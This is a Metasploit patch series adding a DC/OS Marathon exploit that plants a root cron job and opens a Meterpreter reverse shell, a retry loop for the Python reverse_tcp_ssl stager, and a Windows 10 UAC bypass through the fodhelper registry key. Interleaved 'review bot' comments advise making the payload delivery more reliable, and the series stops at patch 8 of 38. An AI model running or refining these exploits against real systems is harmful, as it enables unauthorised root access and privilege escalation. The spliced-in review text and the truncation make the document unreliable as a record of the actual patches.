From 0943eb24a96ade271a5f1b11eab1d258484710d1 Mon Sep 17 00:00:00 2001
From: wolfthefallen
Date: Fri, 3 Mar 2017 09:56:14 -0500
Subject: [PATCH 01/38] DC/OS Marathon UI Exploit
---
modules/exploits/linux/http/dcos_marathon.rb | 201 +++++++++++++++++++
1 file changed, 201 insertions(+)
create mode 100644 modules/exploits/linux/http/dcos_marathon.rb
diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb
new file mode 100644
index 0000000000..9fdfe56591
--- /dev/null
+++ b/modules/exploits/linux/http/dcos_marathon.rb
@@ -0,0 +1,201 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DC/OS Marathon UI Docker Exploit', + 'Description' => %q{ + Utilizing the DCOS Cluster's Marathon UI, an attacker can create + a docker container with the '/' path mounted with read/write + permissions on the host server that is running the docker container. + As the docker container excutes command as uid 0 it is honored + by the host operating system allowing the attacker to edit/create + files owed by root. This exploit abuses this to creates a cron job + in the '/etc/cron.d/' path of the host server. + + *Notes: The docker image must be a valid docker image from + hub.docker.com. Further more the docker container will only + deploy if there are resources available in the DC/OS cluster. 
+ }, + 'Author' => 'Erik Daguerre', + 'License' => MSF_LICENSE, + 'References' => [ + [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'], + ], + 'Payload' => + { + 'DisableNops'=> true, + }, + 'Targets' => [ + [ 'Python', { + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Payload' => { + 'Compat' => { + 'ConnectionType' => 'reverse noconn none tunnel' + } + } + } + ] + ], + 'DefaultOptions' => { 'WfsDelay' => 75 }, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 03, 2017')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]), + OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), + OptString.new('CONTAINER_ID', [ false, 'container id you would like']), + OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wiat for the docker container to deploy', 60 ]) + ], self.class) + end + + def get_apps + res = send_request_raw({ + 'method' => 'GET', + 'uri' => target_uri.path + }) + return unless res and res.code == 200 + + # verify it is marathon ui, and is returning content-type json + return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json' + apps = JSON.parse(res.body) + + apps + end + + def del_container(container_id) + res = send_request_raw({ + 'method' => 'DELETE', + 'uri' => normalize_uri(target_uri.path, container_id) + }) + return unless res and res.code == 200 + + res.code + end + + def make_container_id + return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil? 
+ + rand_text_alpha_lower(8) + end + + def make_cmd(mnt_path, cron_path, payload_path) + vprint_status('Creating the docker container command') + payload_data = nil + echo_cron_path = mnt_path + cron_path + echo_payload_path = mnt_path + payload_path + + cron_command = "python #{payload_path}" + payload_data = payload.raw + + command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n" + command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n" + command << "echo \"\" >> #{echo_cron_path}\n" + command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n" + command << "sleep 120" + + command + end + + def make_container(mnt_path, cron_path, payload_path, container_id) + vprint_status('Setting container json request variables') + container_data = { + 'cmd' => make_cmd(mnt_path, cron_path, payload_path), + 'cpus' => 1, + 'mem' => 128, + 'disk' => 0, + 'instances' => 1, + 'id' => container_id, + 'container' => { + 'docker' => { + 'image' => datastore['DOCKERIMAGE'], + 'network' => 'HOST', + }, + 'type' => 'DOCKER', + 'volumes' => [ + { + 'hostPath' => '/', + 'containerPath' => mnt_path, + 'mode' => 'RW' + } + ], + }, + 'env' => {}, + 'labels' => {} + } + + container_data + end + + def check + return Exploit::CheckCode::Safe if get_apps.nil? + + Exploit::CheckCode::Appears + end + + def exploit + if get_apps.nil? + fail_with(Failure::Unknown, 'Failed to connect to the targeturi') + end + # create required information to create json container information. 
+ cron_path = '/etc/cron.d/' + rand_text_alpha(8) + payload_path = '/tmp/' + rand_text_alpha(8) + mnt_path = '/mnt/' + rand_text_alpha(8) + container_id = make_container_id() + + res = send_request_raw({ + 'method' => 'POST', + 'uri' => target_uri.path, + 'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json + }) + fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201 + + print_status('The docker container is created, waiting for it to deploy') + register_files_for_cleanup(cron_path, payload_path) + sleep_time = 5 + wait_time = datastore['WAIT_TIMEOUT'] + deleted_container = false + print_status("Waiting up to #{wait_time} seconds for docker container to start") + + while wait_time > 0 + sleep(sleep_time) + wait_time -= sleep_time + apps_status = get_apps + fail_with(Failure::Unkown, 'No apps returned') unless apps_status + + apps_status['apps'].each do |app| + next if app['id'] != "/#{container_id}" + + if app['tasksRunning'] == 1 + print_status('The docker container is running, removing it') + del_container(container_id) + deleted_container = true + wait_time = 0 + else + vprint_status('The docker container is not yet running') + end + break + end + end + + # If the docker container does not deploy remove it and fail out. + unless deleted_container + del_container(container_id) + fail_with(Failure::Unknown, "The docker container failed to start") + end + print_status('Waiting for the cron job to run, can take up to 60 seconds') + end +end From 6a83220131b437a905b3b3fc949c4473a034e2da Mon Sep 17 00:00:00 2001 From: wolfthefallen Date: Fri, 3 Mar 2017 10:49:00 -0500 Subject: [PATCH 02/38] cleaned up travis errors --- modules/exploits/linux/http/dcos_marathon.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb index 9fdfe56591..86327d2786 100644 
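Review bot: `make_cmd` drops `payload.raw` verbatim inside a double-quoted shell `echo "…"`, so any `"`, `$`, backtick or backslash that a Python payload happens to contain is interpreted by the shell Marathon uses to run `cmd`, and the file written to `payload_path` may no longer match what the handler expects. Base64-encoding the payload and decoding it inside the container sidesteps the quoting problem entirely: `command = "echo #{Rex::Text.encode_base64(payload_data)} | base64 -d > #{echo_payload_path}\n"` (`base64` ships with coreutils in Debian-based images such as the default `python:3-slim`; worth confirming for other DOCKERIMAGE values). Separately, `get_apps` calls `.include?` on `res.headers['Content-Type']`, which is nil when the header is absent, so `check` can raise NoMethodError instead of returning Safe; `res.headers['Content-Type'].to_s.include?('application/json')` joined with `&&` rather than `and` makes that guard safe.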
--- a/modules/exploits/linux/http/dcos_marathon.rb +++ b/modules/exploits/linux/http/dcos_marathon.rb @@ -1,5 +1,5 @@ ## -# This module requires Metasploit: http//metasploit.com/download +# This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote by the host operating system allowing the attacker to edit/create files owed by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. - + *Notes: The docker image must be a valid docker image from hub.docker.com. Further more the docker container will only deploy if there are resources available in the DC/OS cluster. @@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote def make_container_id return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil? - + rand_text_alpha_lower(8) end @@ -169,16 +169,16 @@ class MetasploitModule < Msf::Exploit::Remote wait_time = datastore['WAIT_TIMEOUT'] deleted_container = false print_status("Waiting up to #{wait_time} seconds for docker container to start") - + while wait_time > 0 sleep(sleep_time) wait_time -= sleep_time apps_status = get_apps - fail_with(Failure::Unkown, 'No apps returned') unless apps_status - + fail_with(Failure::Unknown, 'No apps returned') unless apps_status + apps_status['apps'].each do |app| next if app['id'] != "/#{container_id}" - + if app['tasksRunning'] == 1 print_status('The docker container is running, removing it') del_container(container_id) @@ -190,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote break end end - + # If the docker container does not deploy remove it and fail out. unless deleted_container del_container(container_id) From a49c0a6824c1951eec56f89849f668832917713d Mon Sep 17 00:00:00 2001 
From: wolfthefallen Date: Fri, 3 Mar 2017 11:03:25 -0500 Subject: [PATCH 03/38] removed trailing line --- modules/exploits/linux/http/dcos_marathon.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb index 86327d2786..dd7168532a 100644 --- a/modules/exploits/linux/http/dcos_marathon.rb +++ b/modules/exploits/linux/http/dcos_marathon.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote files owed by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. - *Notes: The docker image must be a valid docker image from + *Notes: The docker image must be a valid docker image from hub.docker.com. Further more the docker container will only deploy if there are resources available in the DC/OS cluster. }, From 3e9480ebfa1b5a6e5ff53949e9291f3d277a9b93 Mon Sep 17 00:00:00 2001 From: wolfthefallen Date: Sat, 4 Mar 2017 09:50:30 -0500 Subject: [PATCH 04/38] Added documentation --- .../exploit/linux/http/dcos_marathon.md | 193 ++++++++++++++++++ 1 file changed, 193 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/dcos_marathon.md diff --git a/documentation/modules/exploit/linux/http/dcos_marathon.md b/documentation/modules/exploit/linux/http/dcos_marathon.md new file mode 100644 index 0000000000..aec7d7c623 --- /dev/null +++ b/documentation/modules/exploit/linux/http/dcos_marathon.md 
@@ -0,0 +1,193 @@ +# Vulnerable Application +Utilizing the DCOS Cluster's Marathon UI, an attacker can create +a docker container with the '/' path mounted with read/write +permissions on the host server that is running the docker container. +As the docker container excutes command as uid 0 it is honored +by the host operating system allowing the attacker to edit/create +files owed by root. This exploit abuses this to creates a cron job +in the '/etc/cron.d/' path of the host server. + +*Notes: The docker image must be a valid docker image from +hub.docker.com. Further more the docker container will only +deploy if there are resources available in the DC/OS + +## DCOS +This Expoit was tested with CentOS 7 as the host operating system for +the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with +Defualt 'custom' installation for on site premise setup. Only the Install +part of the DCOS guide was completed, the system hardening and securing +your cluster section where skipped. This is to represent a 'Defualt' install +with a system admin conducting hasty deployments taking no thought about security. + + +## To Setup Your Cluster +I recommend doing a 'On-Premies'/custom +cluster. https://dcos.io/docs/1.8/administration/installing/custom/ +Create a virtual CentOS machine, install requirements base on the above +guide. 
+ +```bash +# The TLDR from the above guide +sudo systemctl stop firewalld && sudo systemctl disable firewalld +sudo yum install -y tar xz unzip curl ipset ntp +systemctl start ntpd +systemctl enable ntpd +sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \ + sudo groupadd nogroup && sudo reboot +``` + +Install a supported version of docker on the CentOS systems +https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/ + +```bash +# The TLDR of the above guide +sudo yum -y remove docker docker-common container-selinux +sudo yum -y remove docker-selinux +sudo yum install -y yum-utils +sudo yum-config-manager \ + --add-repo \ + https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo +sudo yum-config-manager --enable docker-testing +sudo yum makecache fast +sudo yum -y install docker-engine-1.11.2 +sudo systemctl start docker +sudo systemctl enable docker +sudo echo overlay > /etc/modules-load.d/overlay.conf +sudo reboot +``` + +Once the CentOS machine has rebooted, edit the systemctl +service file for docker and change the ExecStart- line to +`ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://` +restart the docker service and verify it is running. +lastely generate ssh rsa keys for authentication. And update the +/etc/ssh/sshd_config file to support root login. + +```bash +ssh-keygen -t rsa -b 4096 +# Press enter until complete, DO NOT PUT A PASSWORD. +cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys +cat ~/.ssh/id_rsa # save the output you will need it for later +rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later +``` + +Shut down the CentOS vm, take a snapshot. (This will be your base) +clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent. +Start both virtual machines. Login and get their current IP address. +I recommend giving them static IPs if you have further use for the cluster. 
+ +From here use another linux machine with docker installed to finish +the installation process. I used a ubuntu machine with docker installed. + +Follow the custom CLI guide for creating the required files in +the genconf folder. +https://dcos.io/docs/1.8/administration/installing/custom/cli/ + +Example genconf/config.yaml +``` +--- +agent_list: +- 192.168.0.10 +bootstrap_url: file:///opt/dcos_install_tmp +cluster_name: DCOS +exhibitor_storage_backend: static +ip_detect_filename: /genconf/ip-detect +master_discovery: static +master_list: +- 192.168.0.9 +process_timeout: 10000 +resolvers: +- 8.8.8.8 +- 8.8.4.4 +ssh_port: 22 +ssh_user: root +``` +Example genconf/ip-detect +```bash +#!/usr/bin/env bash +set -o nounset -o errexit +export PATH=/usr/sbin:/usr/bin:$PATH +ip=$(ip addr show ens33) +echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1) +``` + +place your id_rsa ssh key into the genconf file and rename the +file to ssh_key and `chmod 0600 genconf/ssh_key` + +Deploying the cluster +in the folder containing the genconf folder do the following. +NOTE: if following the cli install from DCOS itself, it will fail +if you do --install-prereqs. It will install an unsupported version of +docker. + +```bash +curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh +chmod +x dcos_generate_config.sh +sudo ./dcos_generate_config.sh --genconf +sudo ./dcos_generate_config.sh --preflight +# If all preflight checks pass +sudo ./dcos_generate_config.sh --deploy +# get a cup of coffie +# wait a minute or two after deploy completes +sudo bash dcos_generate_config.sh --postflight +``` + +If all is passing navigate to http://:8080/ +You should see the Marathon UI web application. + +# Exploitation +This module is designed for attacker to leaverage the creatation of a +docker contianer with out authentication through the DCOS Marathon UI +to gain root access to the hosting server of the docker container +in the DCOS cluster. 
+ +## Options +- RHOST is the target IP/Hostname that is hosting the Marathon UI Web application +- RPORT is the Port the Marathon UI service is running on. +- DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit. +- TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps +- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start. +- CONTAINER_ID is optional if you want to have your container docker have a human readable name else it will be randomly generated + +## Steps to exploit with module +- [ ] Start msfconsole +- [ ] use exploit/linux/http/dcos_marathon +- [ ] Set the options appropriately and set VERBOSE to true +- [ ] Verify it creates a docker container and it successfully runs +- [ ] After a minute a session should be opened from the agent server + +## Example Output +``` +msf > use exploit/linux/http/dcos_marathon +msf exploit(dcos_marathon) > set RHOST 192.168.0.9 +RHOST => 192.168.0.9 +msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp +payload => python/meterpreter/reverse_tcp +msf exploit(dcos_marathon) > set LHOST 192.168.0.100 +LHOST => 192.168.0.100 +msf exploit(dcos_marathon) > set verbose true +verbose => true +msf exploit(dcos_marathon) > check +[*] 192.168.0.9:8080 The target appears to be vulnerable. 
+msf exploit(dcos_marathon) > exploit + +[*] Started reverse TCP handler on 192.168.0.100:4444 +[*] Setting container json request variables +[*] Creating the docker container command +[*] The docker container is created, waiting for it to deploy +[*] Waiting up to 60 seconds for docker container to start +[*] The docker container is running, removing it +[*] Waiting for the cron job to run, can take up to 60 seconds +[*] Sending stage (39690 bytes) to 192.168.0.10 +[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500 +[+] Deleted /etc/cron.d/FOWkTeZL +[+] Deleted /tmp/TIWpOfUR + +meterpreter > sysinfo +Computer : localhost.localdomain +OS : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016 +Architecture : x64 +System Language : en_US +Meterpreter : python/linux +meterpreter > +``` From 6c69e13e0004f2e60f8172af40809b48fb1ba887 Mon Sep 17 00:00:00 2001 From: wolfthefallen Date: Sat, 4 Mar 2017 11:28:30 -0500 Subject: [PATCH 05/38] Updated based on comments --- .../modules/exploit/linux/http/dcos_marathon.md | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/documentation/modules/exploit/linux/http/dcos_marathon.md b/documentation/modules/exploit/linux/http/dcos_marathon.md index aec7d7c623..fcf52aa50f 100644 --- a/documentation/modules/exploit/linux/http/dcos_marathon.md +++ b/documentation/modules/exploit/linux/http/dcos_marathon.md 
@@ -73,11 +73,12 @@ rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later Shut down the CentOS vm, take a snapshot. (This will be your base) clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent. -Start both virtual machines. Login and get their current IP address. -I recommend giving them static IPs if you have further use for the cluster. +Start the DCOS-Master and DCOS-Agent virtual machines You just cloned. +Login and get their current IP address. +* Note: I recommend giving them static IPs if you have further use for the cluster. From here use another linux machine with docker installed to finish -the installation process. I used a ubuntu machine with docker installed. +the installation process. I used an ubuntu machine with docker installed. Follow the custom CLI guide for creating the required files in the genconf folder. @@ -132,18 +133,16 @@ sudo ./dcos_generate_config.sh --deploy sudo bash dcos_generate_config.sh --postflight ``` -If all is passing navigate to http://:8080/ +If all is passing navigate to http://[master_ip]:8080/ You should see the Marathon UI web application. # Exploitation -This module is designed for attacker to leaverage the creatation of a +This module is designed for the attacker to leaverage the creatation of a docker contianer with out authentication through the DCOS Marathon UI to gain root access to the hosting server of the docker container in the DCOS cluster. ## Options -- RHOST is the target IP/Hostname that is hosting the Marathon UI Web application -- RPORT is the Port the Marathon UI service is running on. - DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit. - TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps - WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start. 
From 73be4f1c2e8bc265c6db9594010e1d786fda2e31 Mon Sep 17 00:00:00 2001
From: itsmeroy2012
Date: Thu, 4 May 2017 14:51:40 +0530
Subject: [PATCH 06/38] Adding StagerRetryWait option in reverse_tcp_ssl
---
.../core/payload/python/reverse_tcp_ssl.rb | 26 +++++++++++++++----
1 file changed, 21 insertions(+), 5 deletions(-)
diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
index e16eaf003a..cc11aaf135 100644
--- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb
+++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
@@ -22,7 +22,8 @@ module Payload::Python::ReverseTcpSsl
def generate
conf = {
port: datastore['LPORT'],
- host: datastore['LHOST']
+ host: datastore['LHOST'],
+ retry_wait: datastore['StagerRetryWait']
}
generate_reverse_tcp_ssl(conf)
@@ -42,10 +43,25 @@ module Payload::Python::ReverseTcpSsl
def generate_reverse_tcp_ssl(opts={})
# Set up the socket
- cmd = "import ssl,socket,struct\n"
- cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
- cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
- cmd << "s=ssl.wrap_socket(so)\n"
+ cmd = "import ssl,socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n"
+ if datastore['StagerRetryWait'].blank? # do not retry at all (old style)
+ cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
+ cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+ cmd << "s=ssl.wrap_socket(so)\n"
+ else
+ cmd << "while 1:\n"
+ cmd << "\ttry:\n"
+ cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2
+ cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+ cmd << "\t\ts=ssl.wrap_socket(so)\n"
+ cmd << "\t\tbreak\n"
+ cmd << "\texcept:\n"
+ if datastore['StagerRetryWait'].to_i <= 0
+ cmd << "\t\tpass\n" # retry immediately
+ else
+ cmd << "\t\ttime.sleep(#{datastore['StagerRetryWait'].to_i})\n" # retry after waiting
+ end
+ end
cmd << py_send_uuid if include_send_uuid
cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
cmd << "d=s.recv(l)\n"
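Review bot: `generate` now passes `retry_wait: datastore['StagerRetryWait']` in `conf`, but `generate_reverse_tcp_ssl` never reads `opts[:retry_wait]` and instead goes back to `datastore['StagerRetryWait']` four times, so callers that build their own `opts` (the only reason the method takes a hash) cannot control the retry behaviour and the new key is dead. Reading it once at the top — `retry_wait = opts[:retry_wait]` — and using `retry_wait.blank?` / `retry_wait.to_i` in place of the datastore lookups keeps the two in sync. The `if datastore['StagerRetryWait'].to_i <= 0` branch also deserves a comment such as `# 0 means no back-off: the bare except/pass spins on a refused connection`, since a user setting the option to 0 gets a tight reconnect loop rather than "no retry". `generate_reverse_tcp_ssl` continues past the end of the hunk.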
From 74c08cebee3362e748469c8a8416c5d6807e46d9 Mon Sep 17 00:00:00 2001
From: amaloteaux
Date: Mon, 22 May 2017 17:25:17 +0100
Subject: [PATCH 07/38] Add bypassuac fodhelper module for Windows 10
---
.../windows/local/bypassuac_fodhelper.rb | 208 ++++++++++++++++++
1 file changed, 208 insertions(+)
create mode 100644 modules/exploits/windows/local/bypassuac_fodhelper.rb
diff --git a/modules/exploits/windows/local/bypassuac_fodhelper.rb b/modules/exploits/windows/local/bypassuac_fodhelper.rb
new file mode 100644
index 0000000000..71aeef84d2
--- /dev/null
+++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb
@@ -0,0 +1,208 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/exe' +require 'msf/core/exploit/powershell' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Exploit::Powershell + include Post::Windows::Priv + include Post::Windows::Registry + include Post::Windows::Runas + + FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings" + FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command" + EXEC_REG_DELEGATE_VAL = 'DelegateExecute' + EXEC_REG_VAL = '' # This maps to "(Default)" + EXEC_REG_VAL_TYPE = 'REG_SZ' + FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe" + CMD_MAX_LEN = 16383 + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Windows Escalate UAC Protection Bypass (Via FodHelper Registry Key)', + 'Description' => %q{ + This module will bypass Windows 10 UAC by hijacking a special key in the Registry under + the current user hive, and inserting a custom command that will get invoked when + the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC + flag turned off. + + This module modifies a registry key, but cleans up the key once the payload has + been invoked. + + The module does not require the architecture of the payload to match the OS. If + specifying EXE::Custom your DLL should call ExitProcess() after starting your + payload in a separate process. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'winscriptingblog', # UAC bypass discovery and research + 'amaloteaux' , # MSF module + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [ + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultTarget' => 0, + 'References' => [ + [ + 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/', + 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' + ] + ], + 'DisclosureDate'=> 'May 12 2017' + )) + end + + def check + if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled? + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def exploit + commspec = '%COMSPEC%' + registry_view = REGISTRY_VIEW_NATIVE + psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" + + # Make sure we have a sane payload configuration + if sysinfo['Architecture'] == ARCH_X64 + if session.arch == ARCH_X86 + # fodhelper.exe is x64 only exe + commspec = '%WINDIR%\\Sysnative\\cmd.exe' + if target_arch.first == ARCH_X64 + # We can't use absolute path here as + # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session + psh_path = "powershell.exe" + end + end + if target_arch.first == ARCH_X86 + # Invoking x86, so switch to SysWOW64 + psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe" + end + else + # if we're on x86, we can't handle x64 payloads + if target_arch.first == ARCH_X64 + fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System') + end + end + + if !payload.arch.empty? && !(payload.arch.first == target_arch.first) + fail_with(Failure::BadConfig, 'payload and target should use the same architecture') + end + + # Validate that we can actually do things before we bother + # doing any more work + check_permissions! 
+ + case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." + ) + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return + end + + payload_value = rand_text_alpha(8) + psh_path = expand_path(psh_path) + + template_path = Rex::Powershell::Templates::TEMPLATE_DIR + psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) + + if psh_payload.length > CMD_MAX_LEN + fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})") + end + + psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\"" + cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}" + + existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || "" + exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil? + + if existing.empty? + registry_createkey(FODHELPER_WRITE_KEY, registry_view) + end + + print_status("Configuring payload and stager registry keys ...") + unless exist_delegate + registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view) + end + + registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) + registry_setvaldata(FODHELPER_WRITE_KEY, payload_value,psh_payload, EXEC_REG_VAL_TYPE, registry_view) + + # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. 
+ cmd_path = expand_path(commspec) + cmd_args = expand_path("/c #{FODHELPER_PATH}") + print_status("Executing payload: #{cmd_path} #{cmd_args}") + + # We can't use cmd_exec here because it blocks, waiting for a result. + client.sys.process.execute(cmd_path, cmd_args, {'Hidden' => true}) + + # Wait a copule of seconds to give the payload a chance to fire before cleaning up + # TODO: fix this up to use something smarter than a timeout? + Rex::sleep(5) + + handler(client) + + print_status("Cleaining up registry keys ...") + unless exist_delegate + registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view) + end + if existing.empty? + registry_deletekey(FODHELPER_DEL_KEY, registry_view) + else + registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) + end + registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view) + + end + + def check_permissions! + fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? + + # Check if you are an admin + vprint_status('Checking admin status...') + admin_group = is_in_admin_group? + + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + end + + unless is_in_admin_group? + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + + print_status('UAC is Enabled, checking level...') + if admin_group.nil? + print_error('Either whoami is not there or failed to execute') + print_error('Continuing under assumption you already checked...') + else + if admin_group + print_good('Part of Administrators group! Continuing...') + else + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + end + + if get_integrity_level == INTEGRITY_LEVEL_SID[:low] + fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') + end + end +end From 092e7b96b80b576d99782b58c362a2b756d21cff Mon Sep 17 00:00:00 2001 
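Review bot: The registry cleanup in `exploit` only runs on the happy path — nothing between the `registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, …)` call and the `print_status("Cleaining up registry keys ...")` block is protected by `ensure`, so if `client.sys.process.execute` or `handler(client)` raises, or the session drops during `Rex::sleep(5)`, the `ms-settings\shell\open\command` hijack and the PowerShell payload blob stay in the user's hive as a persistent, re-triggerable artifact. Wrapping the execute/sleep/handler calls in `begin … ensure … end` and moving the existing cleanup (DelegateExecute removal, (Default) restore or key delete, payload value removal) into the `ensure` branch fixes that without otherwise changing the flow. The `'References'` entry is also malformed: it is a single four-element array rather than two `[type, value]` pairs, and should read `[ 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/' ],` followed by `[ 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' ]`. In `check_permissions!` the `unless is_in_admin_group?` guard fires before the `admin_group.nil?` branch can, so the "whoami is not there" fallback is unreachable and one of the two should go; while there, "Cleaining" in the status message should be "Cleaning".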
From: amaloteaux
Date: Mon, 22 May 2017 17:27:50 +0100
Subject: [PATCH 08/38] typo
---
modules/exploits/windows/local/bypassuac_fodhelper.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
